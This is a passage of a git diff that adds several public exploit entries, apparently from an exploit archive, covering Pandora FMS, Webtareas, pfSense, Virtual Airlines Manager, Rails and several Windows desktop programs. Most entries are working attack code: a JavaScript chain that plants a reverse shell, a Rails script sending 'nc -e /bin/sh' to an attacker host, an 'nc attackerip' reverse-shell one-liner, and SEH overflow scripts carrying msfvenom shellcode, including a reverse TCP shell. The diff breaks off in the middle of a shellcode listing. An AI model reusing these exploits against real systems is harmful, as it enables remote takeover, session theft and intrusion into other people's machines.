+xhr.open("POST",url,true);
+xhr.setRequestHeader("User-Agent","Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0");
+xhr.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*//'*;q=0.8");
+xhr.setRequestHeader("Accept-Language","en-US,en;q=0.5");
+xhr.setRequestHeader("Accept-Encoding","gzip, deflate");
+xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
+xhr.setRequestHeader("Referer","http://"+Pandora_IP+"/pandora_console/index.php?sec=gservers&sec2=godmode/servers/plugin&tab=&view=1&tab=plugins&pure=");
+xhr.setRequestHeader("Content-Length",payload.length);
+xhr.setRequestHeader("Connection","close");
+xhr.setRequestHeader("Upgrade-Insecure-Requests","1");
+xhr.send(payload);
+
+//I am sleepy, i just want to sleep 5 seconds. Please 
+function sleep(miliseconds) {
+                var currentTime = new Date().getTime();
+                while (currentTime + miliseconds >= new Date().getTime()) {
+                }
+            }
+sleep(5000);
+
+//Grab newly added Plugin ID
+var url="/pandora_console/index.php?sec=gagente&sec2=godmode/agentes/configurar_agente&tab=module&id_agente=2";
+xhr.open("POST",url,false);
+xhr.setRequestHeader("User-Agent","Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0");
+xhr.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*//'*;q=0.8");
+xhr.setRequestHeader("Accept-Language","en-US,en;q=0.5");
+xhr.setRequestHeader("Accept-Encoding","gzip, deflate");
+xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
+xhr.setRequestHeader("Referer","http://"+Pandora_IP+"/pandora_console/index.php?sec=gservers&sec2=godmode/servers/plugin&tab=&view=1&tab=plugins&pure=");
+xhr.setRequestHeader("Content-Length",payload.length);
+xhr.setRequestHeader("Connection","close");
+xhr.setRequestHeader("Upgrade-Insecure-Requests","1");
+xhr.setRequestHeader("Cache-Control","max-age=0");
+var payload ="status_hierachy_mode_sent=1&moduletype=pluginserver&edit_module=1&updbutton=Create";
+xhr.send(payload)
+
+var el = document.createElement('html');
+var add=xhr.responseText.toString();
+el.innerHTML = add;
+var dd = el.querySelector('#id_plugin');
+var plugin_ID =0;
+for (i = 0; i < dd.options.length; i++) {
+	if(dd.options[i].text == randomValue)
+	{
+	   console.log(dd.options[i].value);
+ 	   plugin_ID=dd.options[i].value;
+	   break;
+	}
+}
+
+//Create a new plugin in server module || reverse shell will trigger here 
+var url = "http://"+Pandora_IP+"/pandora_console/index.php?sec=gagente&sec2=godmode/agentes/configurar_agente&tab=module&id_agente=2";
+var payload ="network_component_group=0&id_module_component_type=4&network_component=0&name=AppleBois_"+randomValue+"&disabled_sent=1&id_module_group=1&id_module_type_hidden=1&id_module_type=1&type_names=eyIxIjoiZ2VuZXJpY19kYXRhIiwiMiI6ImdlbmVyaWNfcHJvYyIsIjMiOiJnZW5lcmljX2RhdGFfc3RyaW5nIiwiNCI6ImdlbmVyaWNfZGF0YV9pbmMiLCI1IjoiZ2VuZXJpY19kYXRhX2luY19hYnMifQ%3D%3D&min_warning=0&max_warning=0&str_warning=&warning_inverse_sent=1&min_critical=0&max_critical=0&str_critical=&critical_inverse_sent=1&history_data=1&history_data_sent=1&id_plugin="+plugin_ID+"¯os=eyIxIjp7Im1hY3JvIjoiX2ZpZWxkMV8iLCJkZXNjIjoiIiwiaGVscCI6IiIsInZhbHVlIjoiIiwiaGlkZSI6IiJ9fQ%3D%3D¯o_name%5B%5D=macro_value&custom_id=&unit_select=none&unit_text=&unit=&module_interval_select=300&module_interval_text=5&module_interval=300&module_interval_units=60&moduletype=4&post_process_select=&post_process_text=&post_process=&min=&max=&dynamic_interval_select=0&dynamic_interval_text=&dynamic_interval=None&dynamic_interval_units=1&dynamic_min=0&dynamic_max=0&dynamic_two_tailed_sent=1&id_export=0&throw_unknown_events_sent=1&ff_type_sent=1&each_ff=0&ff_event=0&ff_event_normal=&ff_event_warning=&ff_event_critical=&module_ff_interval=0&ff_timeout=0&id_tag_selected%5B%5D=&id_tag_policy%5B%5D=&quiet_module_sent=1&cps_module=0&description=&critical_instructions=&warning_instructions=&unknown_instructions=&hour_from=*&minute_from=*&mday_from=*&month_from=*&wday_from=*&hour_to=*&minute_to=*&mday_to=*&month_to=*&wday_to=*&max_timeout=0&max_retries=0&id_category=0&parent_module_id=0&autocomplete_agent_name=&agent_autocomplete_idagent_5f0967a872ce2=0&relation_type=direct&crtbutton=Create&id_module=4&create_module=1";
+xhr.open("POST",url,true);
+xhr.setRequestHeader("User-Agent","Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0");
+xhr.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
+xhr.setRequestHeader("Accept-Language","en-US,en;q=0.5");
+xhr.setRequestHeader("Accept-Encoding","gzip, deflate");
+xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
+xhr.setRequestHeader("Referer","http://"+Pandora_IP+"/pandora_console/index.php?sec=gagente&sec2=godmode/agentes/configurar_agente&tab=module&id_agente=2");
+xhr.setRequestHeader("Content-Length",payload.length);
+xhr.setRequestHeader("Connection","close");
+xhr.setRequestHeader("Upgrade-Insecure-Requests","1");
+xhr.send(payload);
+//----------------end of shell.js-------------------------------//
\ No newline at end of file
diff --git a/exploits/php/webapps/48709.txt b/exploits/php/webapps/48709.txt
new file mode 100644
index 000000000..0ba847766
--- /dev/null
+++ b/exploits/php/webapps/48709.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Webtareas 2.1p - Arbitrary File Upload (Authenticated)
+# Author: AppleBois
+# Date: 2020-07-10
+# Exploit author : AppleBois
+# Vendor Hompage:https://sourceforge.net/projects/webtareas/
+# Version: 2.1 && 2.1p
+# Tested on: Window 10 64 bit environment || XAMPP
+# Authenticated User allowed to upload ".exe" and ".shtml" to file uploaded directory
+# More information : https://medium.com/@tehwinsam/webtareas-2-1-c8b406c68c2a
+
+POST /Tareas/webtareas/linkedcontent/addfile.php?doc_type=0&doc_type_ex=&doc_id=1&borne15=0&borne16=0 HTTP/1.1
+Host: 10.10.10.2:81
+Content-Length: 711
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://10.10.10.2:81
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHtJ36OtVyQuyaY6y
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://10.10.10.2:81/Tareas/webtareas/linkedcontent/addfile.php?doc_type=0&doc_id=1&borne15=0&borne16=0
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: webTareasSID=vqg1lbhf9g5esjrie84dsrjjhg; ASP.NET_SessionId=vbrb31kd3s5hmz3uobg0smck; UserSettings=language=1; dnn_IsMobile=False; .ASPXANONYMOUS=VA9hDh-1Ldg0FPbBfd9HAWSTqKjasYcZMlHQnpPaoR5WQipK7Q_kKnAlAqfWp0WgtO8HXH2_Tsrhfh-Z7137cng_MeEp3aiMPswVEPZc-UOdZQTp0; __RequestVerificationToken_L0ROTg2=Js5PUWl0BiY3kJLdEPU2oEna_UsEFTrNQiGY986uBwWdRyVDxr2ItTPSUBd07QX6rRyfXQ2; USERNAME_CHANGED=; language=en-US; authentication=DNN; .DOTNETNUKE=CC547735526446773F995D833FACDA646745AE4409516EBF345F1AC725F7D7CE7BFC420BF5EFE9FE2AEC92B04C89CCD2E64C34BA4E195D7D8D6EED7892574DB3FF02599F; ICMSSESSION=mgnp26oubn7hfc590q6j5c9o70
+Connection: close
+
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y
+Content-Disposition: form-data; name="action"
+
+add
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y
+Content-Disposition: form-data; name="file1"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y
+Content-Disposition: form-data; name="attnam1"
+
+a.shtml
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y
+Content-Disposition: form-data; name="atttmp1"
+
+C:/xampp/htdocs/Tareas/webtareas/files/tmpEDE7.tmp
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y
+Content-Disposition: form-data; name="c"
+
+
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y
+Content-Disposition: form-data; name="ver"
+
+1.0
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y--
\ No newline at end of file
diff --git a/exploits/php/webapps/48714.txt b/exploits/php/webapps/48714.txt
new file mode 100644
index 000000000..f1809bd8b
--- /dev/null
+++ b/exploits/php/webapps/48714.txt
@@ -0,0 +1,40 @@
+# Exploit Title: pfSense 2.4.4-p3 - Cross-Site Request Forgery
+# Date: 2019-09-27
+# Exploit Author: ghost_fh
+# Vendor Homepage: https://www.pfsense.org/
+# Software Link: https://www.pfsense.org/download/index.html?section=downloads
+# Version: Till 2.4.4-p3
+# Tested on: freebsd
+# CVE : CVE-2019-16667
+
+# Vulnerability Description :- The pfsense firewall is vulnerable to RCE
+# chained with CSRF as it uses `csrf magic` library since it allows to tamper
+# the CSRF token values submitted when processing the form requests. Due to
+# this flaw, an attacker can exploit this vulnerability by crafting new page
+# that contains attacker's controlled input such as a "reverse shell" (eg:
+# `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip port
+# >/tmp/f`token value) in the form and entice the victims to click
+# on the crafted link via social engineering methods. Once the victim clicks
+# on the link (try again button in this case), the attacker can take the
+# lateral control of the victim's machine and malicious actions can be
+# performed on the victim's behalf.
+
+
+
+
+

+
+
+
+
+
+

+
+
+
+# Create a malicious page containing the above values and once user clicks on malicious link, 
+# he will be redirected to https://pfsense_ip/diag_command.php page.
+# Victim will be greeted with the "Try again" button.
+# Once victim clicks on the "Try again" button you will be greeted with reverse shell of the victim.
\ No newline at end of file
diff --git a/exploits/php/webapps/48715.txt b/exploits/php/webapps/48715.txt
new file mode 100644
index 000000000..150301ec8
--- /dev/null
+++ b/exploits/php/webapps/48715.txt
@@ -0,0 +1,40 @@
+# Exploit Title: Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting
+# Google Dork:  inurl:"/vam/index_vam_op.php"
+# Date: 2020-06-29
+# Exploit Author: Peter Blue
+# Vendor Homepage: https://virtualairlinesmanager.net
+# Software Link: https://virtualairlinesmanager.net
+# Version: 2.6.2
+# Tested on: Linux (Fedora 23), MariaDB, PHP 5.6.29, Apache
+# CVE: N/A
+
+
+This project looks nice but lacks a lot of input filtering.
+
+This example allows a logged-in user to inject JavaScript code, and this
+case steal a session ID, but other exploits could be injected.
+
+This exploit example assumes you have installed VAM 2.6.2 on a local server.
+
+Steps :-
+
+1. Log on. There is an admin account: Callsign: vam100, Password: 123456
+
+2. Click "Pilot Actions"
+
+3. Click "Internal Mail"
+
+4. Click New Message
+
+5. In "Subject" enter XSS 
+
+6. in "Message" type anything
+
+7. Click "Send"
+
+8. When the page refreshes your PHP session ID will show in an alert box
+
+It is also quite possible to inject raw HTML into the subject.
+
+A bit of Google Dorking revealed many websites running this, some were
+dead, some deserted and a few were live.
\ No newline at end of file
diff --git a/exploits/ruby/webapps/48716.rb b/exploits/ruby/webapps/48716.rb
new file mode 100755
index 000000000..690692267
--- /dev/null
+++ b/exploits/ruby/webapps/48716.rb
@@ -0,0 +1,32 @@
+# Exploit Title: Rails 5.0.1 - Remote Code Execution
+# Date: 2020-07-19
+# Exploit Author: Lucas Amorim
+# Vendor Homepage: www.rubyonrails.org
+# Software Link: www.rubyonrails.org
+# Version: Rails < 5.0.1
+# Tested on: Linux/OSx
+# CVE : CVE-2020-8163
+# More information: https://github.com/sh286/CVE-2020-8163
+
+#!/usr/bin/ruby
+
+require 'net/http'
+
+def header
+  puts "[*] - CVE-2020-8163 - Remote code execution of user-provided local names in Rails < 5.0.1\n" 
+  puts "[*] - Author: Lucas Amorim lucas@lucasamorim.ca"
+  puts "[*] - Usage: \n"
+  puts "ruby exploit.rb   "
+end
+if ARGV.length < 3
+  header
+  exit(-1)
+end
+
+url  = ARGV[0]
+ip   = ARGV[1]
+port = ARGV[2]
+
+puts "[*] Sending payload to #{url}"
+uri = URI(url+"?system(%27nc+-e+/bin/sh+#{ip}+#{port}%27)%3ba%23")
+Net::HTTP.get(uri)
\ No newline at end of file
diff --git a/exploits/windows/dos/48697.py b/exploits/windows/dos/48697.py
new file mode 100755
index 000000000..38f894619
--- /dev/null
+++ b/exploits/windows/dos/48697.py
@@ -0,0 +1,33 @@
+# Exploit Title: Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)
+# Date: 2020-07-20
+# Author: Felipe Winsnes
+# Software Link: https://www.exploit-db.com/apps/463c9e7fe9a39888d3c01bc9ad756bba-UpSetup.exe
+# Version: 3.5
+# Tested on: Windows 7 (x86)
+
+# Blog: https://whitecr0wz.github.io/
+
+# Sadly enough, this vulnerability is not exploitable as there are no friendly PPR addresses available and 
+# yet the vulnerability is triggered with additional padding == can't use addresses with null values.
+
+# Proof of Concept:
+# 1.- Run the python script, it will create a new file "poc.txt".
+# 2.- Copy the content of the new file 'poc.txt' to clipboard.
+# 3.- Open the Application.
+# 4.- Click on "Settings".
+# 4.- Paste contents of the generated file into the parameters "FTP Address", "Username" and Password". Furthermore, check the box with the statement "Check to save password in preferences".
+# 5.- Crashed.
+# 6.- As uploadpref.dat is generated, every time the application opens it will crash, with the SEH values being overwritten. In order to stop this behavior simply delete the file.
+
+# If the contents are only pasted into "Password", the application will only crash once without creating uploadpref.dat.
+
+buffer = "A" * 477 + "BBBB" + "CCCC" + "\xff" * 2000
+
+try:
+    f = open ("poc.txt", "w")
+    f.write(buffer)
+    f.close()
+    print "[+] The file has been created successfully!"
+
+except:
+    print "[!] There has been an error while creating the file."
\ No newline at end of file
diff --git a/exploits/windows/local/48687.py b/exploits/windows/local/48687.py
new file mode 100755
index 000000000..c4a0d9e5a
--- /dev/null
+++ b/exploits/windows/local/48687.py
@@ -0,0 +1,66 @@
+# Exploit Title: Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH)
+# Date: 2020-07-26
+# Author: Felipe Winsnes
+# Software Link: https://nidesoft-dvd-ripper.softonic.com/
+# Version: 5.2.18
+# Tested on: Windows 7 (x86)
+
+# Blog: https://whitecr0wz.github.io/
+
+# Proof of Concept:
+# 1.- Run the python script, it will create the file "poc.txt".
+# 2.- Copy the content of the new file "poc.txt" to clipboard
+# 3.- Open the application.
+# 4.- Paste the clipboard into the "License Code" parameter within registration.
+# 5.- Profit.
+
+import struct
+
+# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread -b "\x00\x0a\x0d"                                                                                                            
+# Payload size: 448 bytes
+
+buf =  b""
+buf += b"\x89\xe5\xda\xda\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49"
+buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
+buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
+buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
+buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6d\x38\x4c"
+buf += b"\x42\x33\x30\x73\x30\x37\x70\x55\x30\x6c\x49\x6b\x55"
+buf += b"\x35\x61\x49\x50\x32\x44\x6e\x6b\x42\x70\x66\x50\x6c"
+buf += b"\x4b\x56\x32\x74\x4c\x6c\x4b\x42\x72\x75\x44\x6c\x4b"
+buf += b"\x54\x32\x31\x38\x74\x4f\x58\x37\x51\x5a\x31\x36\x55"
+buf += b"\x61\x6b\x4f\x4c\x6c\x77\x4c\x33\x51\x53\x4c\x35\x52"
+buf += b"\x76\x4c\x51\x30\x4f\x31\x78\x4f\x74\x4d\x67\x71\x38"
+buf += b"\x47\x68\x62\x4b\x42\x46\x32\x30\x57\x6c\x4b\x71\x42"
+buf += b"\x62\x30\x6e\x6b\x61\x5a\x57\x4c\x6c\x4b\x70\x4c\x54"
+buf += b"\x51\x63\x48\x49\x73\x63\x78\x43\x31\x4e\x31\x43\x61"
+buf += b"\x6c\x4b\x50\x59\x31\x30\x63\x31\x59\x43\x4e\x6b\x77"
+buf += b"\x39\x44\x58\x79\x73\x77\x4a\x62\x69\x4c\x4b\x66\x54"
+buf += b"\x6c\x4b\x47\x71\x78\x56\x70\x31\x39\x6f\x4c\x6c\x6f"
+buf += b"\x31\x58\x4f\x34\x4d\x46\x61\x4b\x77\x46\x58\x4d\x30"
+buf += b"\x53\x45\x5a\x56\x45\x53\x73\x4d\x39\x68\x67\x4b\x73"
+buf += b"\x4d\x51\x34\x74\x35\x79\x74\x53\x68\x6e\x6b\x33\x68"
+buf += b"\x67\x54\x47\x71\x69\x43\x71\x76\x4e\x6b\x74\x4c\x30"
+buf += b"\x4b\x4c\x4b\x73\x68\x47\x6c\x67\x71\x48\x53\x4c\x4b"
+buf += b"\x54\x44\x4c\x4b\x36\x61\x68\x50\x6b\x39\x61\x54\x77"
+buf += b"\x54\x76\x44\x63\x6b\x63\x6b\x31\x71\x32\x79\x72\x7a"
+buf += b"\x52\x71\x39\x6f\x4b\x50\x31\x4f\x61\x4f\x73\x6a\x6e"
+buf += b"\x6b\x65\x42\x48\x6b\x6e\x6d\x61\x4d\x43\x5a\x45\x51"
+buf += b"\x4c\x4d\x6e\x65\x6f\x42\x57\x70\x67\x70\x43\x30\x30"
+buf += b"\x50\x45\x38\x35\x61\x6c\x4b\x72\x4f\x6f\x77\x39\x6f"
+buf += b"\x79\x45\x6f\x4b\x6b\x50\x65\x4d\x67\x5a\x74\x4a\x65"
+buf += b"\x38\x6d\x76\x4f\x65\x6d\x6d\x4f\x6d\x49\x6f\x39\x45"
+buf += b"\x67\x4c\x67\x76\x73\x4c\x47\x7a\x4f\x70\x4b\x4b\x69"
+buf += b"\x70\x32\x55\x47\x75\x6d\x6b\x30\x47\x44\x53\x63\x42"
+buf += b"\x62\x4f\x42\x4a\x75\x50\x43\x63\x6b\x4f\x4e\x35\x71"
+buf += b"\x73\x31\x71\x30\x6c\x55\x33\x54\x6e\x62\x45\x74\x38"
+buf += b"\x53\x55\x65\x50\x41\x41"
+
+nseh = "\xEB\x11\x41\x41"
+seh = struct.pack(" Pack
+# 4. Paste the clipboard into the "Archive To" field and click on Ok button
+
+#!/usr/bin/python
+
+egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c"
+egg += "\x25\x4A\x50\x5c\x25\x4A"
+egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50"
+
+# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI
+buf =  ""
+buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63"
+buf += "\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b"
+buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70"
+buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37"
+buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53"
+buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f"
+buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66"
+buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c"
+buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56"
+buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71"
+buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50"
+buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61"
+buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f"
+buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d"
+buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43"
+buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46"
+buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35"
+buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50"
+buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33"
+buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f"
+buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31"
+buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68"
+buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42"
+buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38"
+buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70"
+buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70"
+buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43"
+buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f"
+buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56"
+buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48"
+buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30"
+buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45"
+buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44"
+buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c"
+buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58"
+buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39"
+buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50"
+buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46"
+buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c"
+buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64"
+buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42"
+buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58"
+buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d"
+buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50"
+buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b"
+buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58"
+buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55"
+buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50"
+buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70"
+buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41"
+
+exploit = "A"*4112
+# 0x40012623 - pop pop ret rtl60.bpl
+exploit += "\x74\x06\x75\x04"
+exploit += "\x23\x26\x01\x40"
+exploit += egg
+exploit += "C"*(5000-4120-len(egg))
+exploit += "T00WT00W"
+exploit += buf
+
+f = open("exploit.txt", "w")
+f.write(exploit)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48689.py b/exploits/windows/local/48689.py
new file mode 100755
index 000000000..ece7e4d0e
--- /dev/null
+++ b/exploits/windows/local/48689.py
@@ -0,0 +1,100 @@
+# Exploit Title: DiskBoss 7.7.14 - 'Reports and Data Directory' Buffer Overflow (SEH Egghunter)
+# Date: 2020-07-26
+# Exploit Author: MasterVlad
+# Vendor Homepage: https://www.diskboss.com/
+# Software Link: https://github.com/x00x00x00x00/diskboss_7.7.14/raw/master/diskboss_setup_v7.7.14.exe
+# Version: 7.7.14
+# Vulnerability Type: Local Buffer Overflow
+# Tested on: Windows 7 32-bit
+
+# Proof of Concept:
+
+# 1. Run the python script
+# 2. Open exploit.txt and copy the content to clipboard
+# 3. Open diskbsg.exe and go to Tools -> DiskBoss Options
+# 4. Go to Advanced and paste the clipboard into the "Reports and Data Directory" field
+# 5. Click on Save button
+
+
+#!/usr/bin/python
+
+# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI
+buf =  ""
+buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63"
+buf += "\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b"
+buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70"
+buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37"
+buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53"
+buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f"
+buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66"
+buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c"
+buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56"
+buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71"
+buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50"
+buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61"
+buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f"
+buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d"
+buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43"
+buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46"
+buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35"
+buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50"
+buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33"
+buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f"
+buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31"
+buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68"
